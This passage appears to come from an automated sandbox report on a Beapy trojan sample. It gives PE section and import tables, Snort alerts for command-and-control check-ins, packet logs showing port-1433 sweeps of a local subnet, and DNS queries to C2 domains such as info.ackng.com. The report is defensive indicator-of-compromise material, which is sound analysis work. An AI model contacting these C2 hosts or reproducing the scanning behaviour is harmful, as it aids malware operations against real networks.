                                                                  .gfids0x3c0000xb80x200False0.302734375data1.89005657537IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x3d0000xea380xec00False0.802105402542data7.29706120507IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x4c0000x17b80x1800False0.805826822917data6.6508798335IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_ICON0x3d1c00xea8data
                                                                  RT_ICON0x3e0680x8a8data
                                                                  RT_ICON0x3e9100x568GLS_BINARY_LSB_FIRST
                                                                  RT_ICON0x3ee780x909bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                  RT_ICON0x47f180x25a8data
                                                                  RT_ICON0x4a4c00x10a8data
                                                                  RT_ICON0x4b5680x468GLS_BINARY_LSB_FIRST
                                                                  RT_GROUP_ICON0x4b9d00x68data
                                                                  DLLImport
                                                                  KERNEL32.dllGetLastError, SetDllDirectoryW, GetModuleFileNameW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, LoadLibraryExW, GetShortPathNameW, FormatMessageW, LoadLibraryA, MultiByteToWideChar, WideCharToMultiByte, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetModuleHandleW, RtlUnwind, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetCommandLineA, ReadFile, CreateFileW, GetDriveTypeW, GetFileType, CloseHandle, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, GetFullPathNameA, CreateDirectoryW, RemoveDirectoryW, FindClose, FindFirstFileExW, FindNextFileW, SetStdHandle, SetConsoleCtrlHandler, DeleteFileW, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, GetACP, HeapFree, HeapAlloc, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleCP, CompareStringW, LCMapStringW, GetCurrentDirectoryW, FlushFileBuffers, SetEnvironmentVariableA, GetFileAttributesExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetStringTypeW, GetProcessHeap, WriteConsoleW, GetTimeZoneInformation, HeapSize, HeapReAlloc, SetEndOfFile, RaiseException
                                                                  WS2_32.dllntohl

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  04/05/21-11:24:49.333871UDP2029058ET TROJAN Win32/Beapy CnC Domain in DNS Lookup5071353192.168.2.38.8.8.8
                                                                  04/05/21-11:24:49.333871UDP2029057ET TROJAN Win32/Beapy CnC Domain in DNS Lookup5071353192.168.2.38.8.8.8
                                                                  04/05/21-11:24:50.606319UDP2029056ET TROJAN Win32/Beapy CnC Domain in DNS Lookup5898753192.168.2.38.8.8.8
                                                                  04/05/21-11:24:50.817349TCP2027149ET TROJAN Py/Beapy CnC Checkin4974380192.168.2.372.52.178.23
                                                                  04/05/21-11:24:51.279850TCP2027149ET TROJAN Py/Beapy CnC Checkin4974680192.168.2.3173.231.189.15
                                                                  04/05/21-11:24:51.679560UDP2029058ET TROJAN Win32/Beapy CnC Domain in DNS Lookup6493853192.168.2.38.8.8.8
                                                                  04/05/21-11:24:51.679560UDP2029057ET TROJAN Win32/Beapy CnC Domain in DNS Lookup6493853192.168.2.38.8.8.8
                                                                  04/05/21-11:24:52.908774UDP2029056ET TROJAN Win32/Beapy CnC Domain in DNS Lookup6491053192.168.2.38.8.8.8
                                                                  04/05/21-11:24:53.023235ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.3
                                                                  04/05/21-11:24:53.128604TCP2027149ET TROJAN Py/Beapy CnC Checkin4988180192.168.2.372.52.178.23
                                                                  04/05/21-11:24:53.487926TCP2027149ET TROJAN Py/Beapy CnC Checkin5000580192.168.2.3173.231.189.15
                                                                  04/05/21-11:24:53.783640UDP2029058ET TROJAN Win32/Beapy CnC Domain in DNS Lookup5613053192.168.2.38.8.8.8
                                                                  04/05/21-11:24:53.783640UDP2029057ET TROJAN Win32/Beapy CnC Domain in DNS Lookup5613053192.168.2.38.8.8.8
                                                                  04/05/21-11:24:54.862765UDP2029056ET TROJAN Win32/Beapy CnC Domain in DNS Lookup5633853192.168.2.38.8.8.8
                                                                  04/05/21-11:24:55.111430TCP2027149ET TROJAN Py/Beapy CnC Checkin5036680192.168.2.372.52.178.23
                                                                  04/05/21-11:24:55.529436ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.3
                                                                  04/05/21-11:24:55.574418TCP2027149ET TROJAN Py/Beapy CnC Checkin5049080192.168.2.3173.231.189.15
                                                                  04/05/21-11:24:55.869952UDP2029058ET TROJAN Win32/Beapy CnC Domain in DNS Lookup5878453192.168.2.38.8.8.8
                                                                  04/05/21-11:24:55.869952UDP2029057ET TROJAN Win32/Beapy CnC Domain in DNS Lookup5878453192.168.2.38.8.8.8
                                                                  04/05/21-11:24:56.031255ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.3
                                                                  04/05/21-11:24:58.338210UDP2029056ET TROJAN Win32/Beapy CnC Domain in DNS Lookup6397853192.168.2.38.8.8.8
                                                                  04/05/21-11:24:58.550501TCP2027149ET TROJAN Py/Beapy CnC Checkin5091980192.168.2.372.52.178.23
                                                                  04/05/21-11:24:58.959186TCP2027149ET TROJAN Py/Beapy CnC Checkin5099380192.168.2.3173.231.189.15
                                                                  04/05/21-11:24:59.292835UDP2029058ET TROJAN Win32/Beapy CnC Domain in DNS Lookup5570853192.168.2.38.8.8.8
                                                                  04/05/21-11:24:59.292835UDP2029057ET TROJAN Win32/Beapy CnC Domain in DNS Lookup5570853192.168.2.38.8.8.8
                                                                  04/05/21-11:25:00.380859UDP2029056ET TROJAN Win32/Beapy CnC Domain in DNS Lookup5680353192.168.2.38.8.8.8
                                                                  04/05/21-11:25:00.785960TCP2027149ET TROJAN Py/Beapy CnC Checkin5135080192.168.2.372.52.178.23
                                                                  04/05/21-11:25:01.451047TCP2027149ET TROJAN Py/Beapy CnC Checkin5138480192.168.2.3173.231.189.15
                                                                  04/05/21-11:25:01.757683UDP2029058ET TROJAN Win32/Beapy CnC Domain in DNS Lookup5535953192.168.2.38.8.8.8
                                                                  04/05/21-11:25:01.757683UDP2029057ET TROJAN Win32/Beapy CnC Domain in DNS Lookup5535953192.168.2.38.8.8.8
                                                                  04/05/21-11:25:01.813629UDP254DNS SPOOF query response with TTL of 1 min. and no authority53553598.8.8.8192.168.2.3
                                                                  04/05/21-11:25:02.576675ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.3
                                                                  04/05/21-11:25:03.063101UDP2029056ET TROJAN Win32/Beapy CnC Domain in DNS Lookup5830653192.168.2.38.8.8.8
                                                                  04/05/21-11:25:03.288067TCP2027149ET TROJAN Py/Beapy CnC Checkin5177280192.168.2.372.52.178.23
                                                                  04/05/21-11:25:03.581136ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.3
                                                                  04/05/21-11:25:04.690469TCP2027149ET TROJAN Py/Beapy CnC Checkin5198180192.168.2.3173.231.189.15
                                                                  04/05/21-11:25:07.607306ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.3
                                                                  04/05/21-11:25:11.625239ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.3
                                                                  04/05/21-11:25:13.642352ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.3
                                                                  04/05/21-11:25:17.666842ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.3
                                                                  04/05/21-11:25:18.677057ICMP401ICMP Destination Unreachable Network Unreachable149.11.89.129192.168.2.3
                                                                  04/05/21-11:25:32.822281ICMP399ICMP Destination Unreachable Host Unreachable10.203.17.1192.168.2.3
                                                                  04/05/21-11:25:32.822308ICMP399ICMP Destination Unreachable Host Unreachable10.203.17.1192.168.2.3
                                                                  04/05/21-11:25:32.822325ICMP399ICMP Destination Unreachable Host Unreachable10.203.17.1192.168.2.3
                                                                  04/05/21-11:25:32.822335ICMP399ICMP Destination Unreachable Host Unreachable10.203.17.1192.168.2.3
                                                                  04/05/21-11:25:32.822348ICMP399ICMP Destination Unreachable Host Unreachable10.203.17.1192.168.2.3
                                                                  04/05/21-11:25:32.822359ICMP399ICMP Destination Unreachable Host Unreachable10.203.17.1192.168.2.3
                                                                  04/05/21-11:25:33.838811ICMP399ICMP Destination Unreachable Host Unreachable10.203.17.1192.168.2.3
                                                                  04/05/21-11:25:34.848817ICMP399ICMP Destination Unreachable Host Unreachable10.203.17.1192.168.2.3
                                                                  04/05/21-11:25:34.848856ICMP399ICMP Destination Unreachable Host Unreachable10.203.17.1192.168.2.3
                                                                  04/05/21-11:25:35.838762ICMP399ICMP Destination Unreachable Host Unreachable10.203.17.1192.168.2.3
                                                                  04/05/21-11:25:36.852461ICMP399ICMP Destination Unreachable Host Unreachable10.203.17.1192.168.2.3
                                                                  04/05/21-11:25:37.865443ICMP399ICMP Destination Unreachable Host Unreachable10.203.17.1192.168.2.3

                                                                  Network Port Distribution

                                                                  • Total Packets: 86
                                                                  • 443 (HTTPS)
                                                                  • 80 (HTTP)
                                                                  • 53 (DNS)
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Apr 5, 2021 11:24:50.483365059 CEST4974280192.168.2.379.98.145.42
                                                                  Apr 5, 2021 11:24:50.547956944 CEST804974279.98.145.42192.168.2.3
                                                                  Apr 5, 2021 11:24:50.548065901 CEST4974280192.168.2.379.98.145.42
                                                                  Apr 5, 2021 11:24:50.548393011 CEST4974280192.168.2.379.98.145.42
                                                                  Apr 5, 2021 11:24:50.614001989 CEST804974279.98.145.42192.168.2.3
                                                                  Apr 5, 2021 11:24:50.614840031 CEST804974279.98.145.42192.168.2.3
                                                                  Apr 5, 2021 11:24:50.614959002 CEST804974279.98.145.42192.168.2.3
                                                                  Apr 5, 2021 11:24:50.615056038 CEST4974280192.168.2.379.98.145.42
                                                                  Apr 5, 2021 11:24:50.615497112 CEST4974280192.168.2.379.98.145.42
                                                                  Apr 5, 2021 11:24:50.663203955 CEST4974380192.168.2.372.52.178.23
                                                                  Apr 5, 2021 11:24:50.679153919 CEST804974279.98.145.42192.168.2.3
                                                                  Apr 5, 2021 11:24:50.734977007 CEST4974480192.168.2.345.79.77.20
                                                                  Apr 5, 2021 11:24:50.816993952 CEST804974372.52.178.23192.168.2.3
                                                                  Apr 5, 2021 11:24:50.817128897 CEST4974380192.168.2.372.52.178.23
                                                                  Apr 5, 2021 11:24:50.817348957 CEST4974380192.168.2.372.52.178.23
                                                                  Apr 5, 2021 11:24:50.929757118 CEST804974445.79.77.20192.168.2.3
                                                                  Apr 5, 2021 11:24:50.930602074 CEST4974480192.168.2.345.79.77.20
                                                                  Apr 5, 2021 11:24:50.930787086 CEST4974480192.168.2.345.79.77.20
                                                                  Apr 5, 2021 11:24:50.970932007 CEST804974372.52.178.23192.168.2.3
                                                                  Apr 5, 2021 11:24:50.970973969 CEST804974372.52.178.23192.168.2.3
                                                                  Apr 5, 2021 11:24:50.971112013 CEST4974380192.168.2.372.52.178.23
                                                                  Apr 5, 2021 11:24:51.122077942 CEST4974680192.168.2.3173.231.189.15
                                                                  Apr 5, 2021 11:24:51.123806000 CEST804974445.79.77.20192.168.2.3
                                                                  Apr 5, 2021 11:24:51.124084949 CEST804974445.79.77.20192.168.2.3
                                                                  Apr 5, 2021 11:24:51.124116898 CEST804974445.79.77.20192.168.2.3
                                                                  Apr 5, 2021 11:24:51.124193907 CEST4974480192.168.2.345.79.77.20
                                                                  Apr 5, 2021 11:24:51.124943972 CEST4974480192.168.2.345.79.77.20
                                                                  Apr 5, 2021 11:24:51.185297966 CEST49747443192.168.2.345.79.77.20
                                                                  Apr 5, 2021 11:24:51.279521942 CEST8049746173.231.189.15192.168.2.3
                                                                  Apr 5, 2021 11:24:51.279640913 CEST4974680192.168.2.3173.231.189.15
                                                                  Apr 5, 2021 11:24:51.279850006 CEST4974680192.168.2.3173.231.189.15
                                                                  Apr 5, 2021 11:24:51.318022013 CEST804974445.79.77.20192.168.2.3
                                                                  Apr 5, 2021 11:24:51.377563000 CEST4434974745.79.77.20192.168.2.3
                                                                  Apr 5, 2021 11:24:51.377674103 CEST49747443192.168.2.345.79.77.20
                                                                  Apr 5, 2021 11:24:51.420175076 CEST8049746173.231.189.15192.168.2.3
                                                                  Apr 5, 2021 11:24:51.420372963 CEST8049746173.231.189.15192.168.2.3
                                                                  Apr 5, 2021 11:24:51.420406103 CEST8049746173.231.189.15192.168.2.3
                                                                  Apr 5, 2021 11:24:51.420490026 CEST4974680192.168.2.3173.231.189.15
                                                                  Apr 5, 2021 11:24:51.444173098 CEST4974680192.168.2.3173.231.189.15
                                                                  Apr 5, 2021 11:24:51.595592022 CEST8049746173.231.189.15192.168.2.3
                                                                  Apr 5, 2021 11:24:51.957613945 CEST49747443192.168.2.345.79.77.20
                                                                  Apr 5, 2021 11:24:52.150078058 CEST4434974745.79.77.20192.168.2.3
                                                                  Apr 5, 2021 11:24:52.150154114 CEST4434974745.79.77.20192.168.2.3
                                                                  Apr 5, 2021 11:24:52.150207043 CEST4434974745.79.77.20192.168.2.3
                                                                  Apr 5, 2021 11:24:52.150362968 CEST49747443192.168.2.345.79.77.20
                                                                  Apr 5, 2021 11:24:52.153565884 CEST49747443192.168.2.345.79.77.20
                                                                  Apr 5, 2021 11:24:52.345915079 CEST4434974745.79.77.20192.168.2.3
                                                                  Apr 5, 2021 11:24:52.346990108 CEST4434974745.79.77.20192.168.2.3
                                                                  Apr 5, 2021 11:24:52.347978115 CEST49747443192.168.2.345.79.77.20
                                                                  Apr 5, 2021 11:24:52.540735006 CEST4434974745.79.77.20192.168.2.3
                                                                  Apr 5, 2021 11:24:52.541574001 CEST4434974745.79.77.20192.168.2.3
                                                                  Apr 5, 2021 11:24:52.541619062 CEST4434974745.79.77.20192.168.2.3
                                                                  Apr 5, 2021 11:24:52.541868925 CEST49747443192.168.2.345.79.77.20
                                                                  Apr 5, 2021 11:24:52.542520046 CEST49747443192.168.2.345.79.77.20
                                                                  Apr 5, 2021 11:24:52.901719093 CEST4974380192.168.2.372.52.178.23
                                                                  Apr 5, 2021 11:24:52.970424891 CEST4988180192.168.2.372.52.178.23
                                                                  Apr 5, 2021 11:24:53.056951046 CEST804974372.52.178.23192.168.2.3
                                                                  Apr 5, 2021 11:24:53.128215075 CEST804988172.52.178.23192.168.2.3
                                                                  Apr 5, 2021 11:24:53.128387928 CEST4988180192.168.2.372.52.178.23
                                                                  Apr 5, 2021 11:24:53.128603935 CEST4988180192.168.2.372.52.178.23
                                                                  Apr 5, 2021 11:24:53.289665937 CEST804988172.52.178.23192.168.2.3
                                                                  Apr 5, 2021 11:24:53.289691925 CEST804988172.52.178.23192.168.2.3
                                                                  Apr 5, 2021 11:24:53.289792061 CEST4988180192.168.2.372.52.178.23
                                                                  Apr 5, 2021 11:24:53.352454901 CEST5000580192.168.2.3173.231.189.15
                                                                  Apr 5, 2021 11:24:53.486607075 CEST8050005173.231.189.15192.168.2.3
                                                                  Apr 5, 2021 11:24:53.487891912 CEST5000580192.168.2.3173.231.189.15
                                                                  Apr 5, 2021 11:24:53.487926006 CEST5000580192.168.2.3173.231.189.15
                                                                  Apr 5, 2021 11:24:53.561211109 CEST500061433192.168.2.3192.168.0.4
                                                                  Apr 5, 2021 11:24:53.561536074 CEST500081433192.168.2.3192.168.0.2
                                                                  Apr 5, 2021 11:24:53.561790943 CEST500071433192.168.2.3192.168.0.3
                                                                  Apr 5, 2021 11:24:53.561959982 CEST500091433192.168.2.3192.168.0.1
                                                                  Apr 5, 2021 11:24:53.575000048 CEST500101433192.168.2.3192.168.0.6
                                                                  Apr 5, 2021 11:24:53.575397968 CEST500111433192.168.2.3192.168.0.7
                                                                  Apr 5, 2021 11:24:53.575443983 CEST500121433192.168.2.3192.168.0.5
                                                                  Apr 5, 2021 11:24:53.591028929 CEST500131433192.168.2.3192.168.0.8
                                                                  Apr 5, 2021 11:24:53.599291086 CEST500141433192.168.2.3192.168.0.10
                                                                  Apr 5, 2021 11:24:53.599441051 CEST500151433192.168.2.3192.168.0.9
                                                                  Apr 5, 2021 11:24:53.599553108 CEST500171433192.168.2.3192.168.0.12
                                                                  Apr 5, 2021 11:24:53.599566936 CEST500161433192.168.2.3192.168.0.11
                                                                  Apr 5, 2021 11:24:53.606976032 CEST500181433192.168.2.3192.168.0.17
                                                                  Apr 5, 2021 11:24:53.607280016 CEST500201433192.168.2.3192.168.0.16
                                                                  Apr 5, 2021 11:24:53.607301950 CEST500191433192.168.2.3192.168.0.18
                                                                  Apr 5, 2021 11:24:53.607460976 CEST500211433192.168.2.3192.168.0.15
                                                                  Apr 5, 2021 11:24:53.607597113 CEST500231433192.168.2.3192.168.0.13
                                                                  Apr 5, 2021 11:24:53.607610941 CEST500221433192.168.2.3192.168.0.14
                                                                  Apr 5, 2021 11:24:53.622591019 CEST500241433192.168.2.3192.168.0.19
                                                                  Apr 5, 2021 11:24:53.622827053 CEST500251433192.168.2.3192.168.0.20
                                                                  Apr 5, 2021 11:24:53.622853994 CEST500261433192.168.2.3192.168.0.21
                                                                  Apr 5, 2021 11:24:53.623029947 CEST500271433192.168.2.3192.168.0.22
                                                                  Apr 5, 2021 11:24:53.623047113 CEST500281433192.168.2.3192.168.0.23
                                                                  Apr 5, 2021 11:24:53.637516975 CEST8050005173.231.189.15192.168.2.3
                                                                  Apr 5, 2021 11:24:53.637577057 CEST8050005173.231.189.15192.168.2.3
                                                                  Apr 5, 2021 11:24:53.637614012 CEST8050005173.231.189.15192.168.2.3
                                                                  Apr 5, 2021 11:24:53.639019966 CEST5000580192.168.2.3173.231.189.15
                                                                  Apr 5, 2021 11:24:53.639081001 CEST5000580192.168.2.3173.231.189.15
                                                                  Apr 5, 2021 11:24:53.639200926 CEST500291433192.168.2.3192.168.0.30
                                                                  Apr 5, 2021 11:24:53.639528036 CEST500311433192.168.2.3192.168.0.28
                                                                  Apr 5, 2021 11:24:53.639579058 CEST500301433192.168.2.3192.168.0.29
                                                                  Apr 5, 2021 11:24:53.639755011 CEST500321433192.168.2.3192.168.0.27
                                                                  Apr 5, 2021 11:24:53.639974117 CEST500331433192.168.2.3192.168.0.25
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Apr 5, 2021 11:22:49.607069016 CEST6015253192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:22:49.652981043 CEST53601528.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:22:50.815520048 CEST5754453192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:22:50.861664057 CEST53575448.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:22:51.977514982 CEST5598453192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:22:52.037918091 CEST53559848.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:22:53.123909950 CEST6418553192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:22:53.169991970 CEST53641858.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:22:55.185316086 CEST6511053192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:22:55.231291056 CEST53651108.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:23:00.278623104 CEST5836153192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:23:00.324846983 CEST53583618.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:23:03.558404922 CEST6349253192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:23:03.612797976 CEST53634928.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:23:05.042999029 CEST6083153192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:23:05.091737032 CEST53608318.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:23:06.056345940 CEST6010053192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:23:06.104001045 CEST53601008.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:23:08.322554111 CEST5319553192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:23:08.380052090 CEST53531958.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:23:09.197833061 CEST5014153192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:23:09.246639967 CEST53501418.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:23:11.070559978 CEST5302353192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:23:11.119549990 CEST53530238.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:23:13.286232948 CEST4956353192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:23:13.344415903 CEST53495638.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:23:15.971927881 CEST5135253192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:23:16.023255110 CEST53513528.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:23:16.923983097 CEST5934953192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:23:16.971874952 CEST53593498.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:23:17.730626106 CEST5708453192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:23:17.784784079 CEST53570848.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:23:20.672679901 CEST5882353192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:23:20.723953009 CEST53588238.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:23:21.714570045 CEST5756853192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:23:21.760602951 CEST53575688.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:23:24.047540903 CEST5054053192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:23:24.095136881 CEST53505408.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:23:30.239722967 CEST5436653192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:23:30.314647913 CEST53543668.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:23:46.501765013 CEST5303453192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:23:46.519735098 CEST5776253192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:23:46.548104048 CEST53530348.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:23:46.573817015 CEST53577628.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:42.737785101 CEST5543553192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:42.793589115 CEST53554358.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:49.333870888 CEST5071353192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:49.428086996 CEST53507138.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:50.429013014 CEST5613253192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:50.480840921 CEST53561328.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:50.606318951 CEST5898753192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:50.660466909 CEST53589878.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:50.666121960 CEST5657953192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:50.722232103 CEST53565798.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:50.978039026 CEST6063353192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:51.015222073 CEST6129253192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:51.069844961 CEST53612928.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:51.119930029 CEST53606338.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:51.129632950 CEST6361953192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:51.183566093 CEST53636198.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:51.679559946 CEST6493853192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:51.730968952 CEST6194653192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:51.738825083 CEST53649388.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:51.787220955 CEST53619468.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:52.908773899 CEST6491053192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:52.966620922 CEST53649108.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:53.295975924 CEST5212353192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:53.350553989 CEST53521238.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:53.783639908 CEST5613053192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:53.842984915 CEST53561308.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:54.862765074 CEST5633853192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:54.935036898 CEST53563388.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:55.272763968 CEST5942053192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:55.418486118 CEST53594208.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:55.869951963 CEST5878453192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:55.921319008 CEST53587848.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:58.338210106 CEST6397853192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:58.392496109 CEST53639788.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:58.716615915 CEST6293853192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:58.770958900 CEST53629388.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:24:59.292834997 CEST5570853192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:24:59.349452972 CEST53557088.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:25:00.380858898 CEST5680353192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:25:00.541034937 CEST53568038.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:25:01.243465900 CEST5714553192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:25:01.300173998 CEST53571458.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:25:01.757683039 CEST5535953192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:25:01.813628912 CEST53553598.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:25:03.063101053 CEST5830653192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:25:03.117399931 CEST53583068.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:25:04.465533972 CEST6412453192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:25:04.514276981 CEST53641248.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:25:08.219528913 CEST4936153192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:25:08.292540073 CEST53493618.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:25:29.181730032 CEST6315053192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:25:29.238317966 CEST53631508.8.8.8192.168.2.3
                                                                  Apr 5, 2021 11:25:29.737430096 CEST5327953192.168.2.38.8.8.8
                                                                  Apr 5, 2021 11:25:29.799674034 CEST53532798.8.8.8192.168.2.3

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Apr 5, 2021 11:24:49.333870888 CEST192.168.2.38.8.8.80xc6cdStandard query (0)info.ackng.comA (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:50.429013014 CEST192.168.2.38.8.8.80xcd26Standard query (0)ip.42.plA (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:50.606318951 CEST192.168.2.38.8.8.80xc903Standard query (0)info.beahh.comA (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:50.666121960 CEST192.168.2.38.8.8.80xbc17Standard query (0)jsonip.comA (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:50.978039026 CEST192.168.2.38.8.8.80x6932Standard query (0)info.abbny.comA (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:51.129632950 CEST192.168.2.38.8.8.80xa295Standard query (0)jsonip.comA (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:51.679559946 CEST192.168.2.38.8.8.80xc2f3Standard query (0)info.ackng.comA (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:52.908773899 CEST192.168.2.38.8.8.80x81dfStandard query (0)info.beahh.comA (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:53.295975924 CEST192.168.2.38.8.8.80x30c0Standard query (0)info.abbny.comA (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:53.783639908 CEST192.168.2.38.8.8.80x25a6Standard query (0)info.ackng.comA (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:54.862765074 CEST192.168.2.38.8.8.80xe70eStandard query (0)info.beahh.comA (IP address)IN (0x0001)
                                                                  Apr 5, 2021 11:24:55.272763968 CEST192.168.2.38.8.8.80x179fStandard query (0)info.abbny.comA (IP address)IN (0x0001)
